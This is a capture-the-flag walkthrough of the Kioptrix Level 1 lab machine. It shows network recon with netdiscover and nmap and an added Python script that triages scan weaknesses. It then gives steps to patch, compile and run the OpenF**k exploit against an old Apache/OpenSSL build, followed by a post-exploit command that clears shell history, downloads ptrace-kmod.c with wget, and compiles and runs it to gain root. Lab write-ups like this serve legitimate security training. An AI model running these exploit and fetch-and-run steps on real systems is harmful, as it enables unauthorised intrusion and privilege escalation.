Description:
The Kioptrix series are easy challenges that progress in difficulty as the levels progress. The objective is to acquire root access on the virtual machine, and to teach players the basic techniques in discovering security weaknesses in systems. There are also many ways to complete the challenges, something to keep in mind if you choose to approach them differently from the way they are presented here.
What you'll Learn
- Information Gathering
- Vulnerability Exploitation
Information Gathering
The first step is to find our IP Address and then identify our target using Information Gathering techniques. This includes Footprinting and Fingerprinting hosts, servers, etc. If you want to learn more then I suggest you read the PTES Technical Guidelines.
root@cmd-n-ctrl:~# ifconfig
eth0: flags=4163 mtu 1500
inet 192.168.2.142 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::20c:29ff:fe27:4277 prefixlen 64 scopeid 0x20
ether 00:0c:29:27:42:77 txqueuelen 1000 (Ethernet)
RX packets 127583 bytes 190056434 (181.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 63804 bytes 3493560 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 18 base 0x2000
Next we will use the netdiscover command to find out which hosts are on our network:
root@cmd-n-ctrl:~# netdiscover
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.2.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.2.2 00:50:56:e1:58:90 1 60 VMware, Inc.
192.168.2.141 00:0c:29:f8:f6:d7 1 60 VMware, Inc.
192.168.2.254 00:50:56:ec:88:ae 1 60 VMware, Inc.
Great, we now know the IP address of 192.168.2.141 is the target of our Kioptrix Machine. Next we need to run an nmap scan to search for any open ports or services running on the Kioptrix VM.
Below you will see the nmap command being run. If you don't understand what these switches are doing, then I suggest you read up on nmap switches, which can be found here!
root@cmd-n-ctrl:~# nmap -sS -A -n 192.168.2.141
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-31 15:20 GMT
Nmap scan report for 192.168.2.141
Host is up (0.00023s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-01-31T06:10:35+00:00; -9h10m32s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:F8:F6:D7 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: mean: -9h10m32s, deviation: 0s, median: -9h10m32s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 192.168.2.141
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 267.58 seconds
Looking at the nmap results we can see that ports 22 (SSH) and 80 (HTTP) are open. After further examination of the nmap scan we can see that Apache is running version 1.3.20, which is seriously outdated! At the same time, we can see that Apache is running OpenSSL 2.8.4.
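As an added example (not code from the original post), the following Python script runs simple triage rules over an excerpt of the nmap output above and lists the weaknesses a defender would want to fix before anything else; the excerpt and the rules are constructed for this page.

```python
import re

# Constructed excerpt of the nmap -sS -A output shown above (not the full scan).
NMAP_OUTPUT = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
"""

# Matches the "PORT STATE SERVICE VERSION" rows; script output rows start with "|".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def triage(nmap_text):
    """Return (port, finding) tuples for the weaknesses visible in the scan.
    The rules are hypothetical and cover only what this scan exposes."""
    findings = []
    port = None
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, version = int(m.group(1)), m.group(4)
            # Apache 1.3.x is end-of-life; the OpenSSL build is in the same banner.
            if "Apache" in version and re.search(r"1\.3\.\d+", version):
                findings.append((port, "end-of-life Apache 1.3.x"))
            ssl = re.search(r"OpenSSL/([\w.]+)", version)
            if ssl and ssl.group(1).startswith("0.9.6"):
                findings.append((port, "OpenSSL 0.9.6b, the build the OpenF**k exploit targets"))
            continue
        # Remaining lines belong to the NSE script output of the last port seen.
        if "Server supports SSHv1" in line:
            findings.append((port, "SSHv1 enabled"))
        elif "SSLv2 supported" in line:
            findings.append((port, "SSLv2 enabled"))
        elif "EXPORT40" in line:
            findings.append((port, "40-bit export cipher offered"))
        elif "Potentially risky methods" in line and "TRACE" in line:
            findings.append((port, "HTTP TRACE enabled"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(NMAP_OUTPUT):
        print(f"{port:>5}/tcp  {finding}")
```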
The exploit database is an excellent resource for finding publicly available exploits. After a quick search for OpenSSL Version 2.8, we stumble across the OpenSSL - 'OpenF**k'.c exploit!
Let's download the exploit to our Kali Machine. Before we compile the exploit we need to update the code, as it's pretty old; I'm using the steps outlined in PaulSec's Blog.
Using your favorite text editor here are the steps to make it work:
1) Add the following headers:
#include <openssl/rc4.h>
#include <openssl/md5.h>
2) Update the URL of the C File:
First search for wget and find the following line:
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
Then replace the URL with this one:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
3) Get the libssl-dev lib
The exploit (764.c) doesn't seem to be compatible with the newer version of libssl, so you need to install v1.0. To install the library, type the following in your terminal:
root@cmd-n-ctrl:~# apt-get install libssl1.0-dev
4) Update declaration of variables:
On line 916, change:
unsigned char *p, *end;
By adding const:
const unsigned char *p, *end;
5) Go ahead and save the file, compile the code, and we are done!
root@kali:~# gcc -o OpenF**k 764.c -lcrypto
NOTE: 764.c is the file that I saved my exploit script to. -o just means to output to a new executable called OpenF**k.
Next let’s go ahead and run the exploit and see its usage.
root@cmd-n-ctrl:~# ./OpenF**k
*******************************************************************
* OpenF**k v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
************************* - snippet - *****************************
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
*******************************************************************
: Usage: ./OpenF**k target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
Since Apache is running on Version 1.3.20, I will select 0x6b as our target. The exploit's full output lists every supported target; I trimmed it above to save some space.
Now that we know the target version, IP Address, and HTTP Port - we can run the exploit!
root@cmd-n-ctrl:~# ./OpenF**k 0x6b 192.168.2.141 443 -c 40
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--02:09:33-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--02:09:33-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
02:09:34 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1546
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
Conclusion:
Kioptrix Level 1 has been pwnd with a well-known vulnerability and we got root!
The main objective was to learn some of the basics in tool usage and exploitation. There are 4 more levels in this series, and it just gets harder from here. I hope you're ready for the challenge!
Thanks for reading!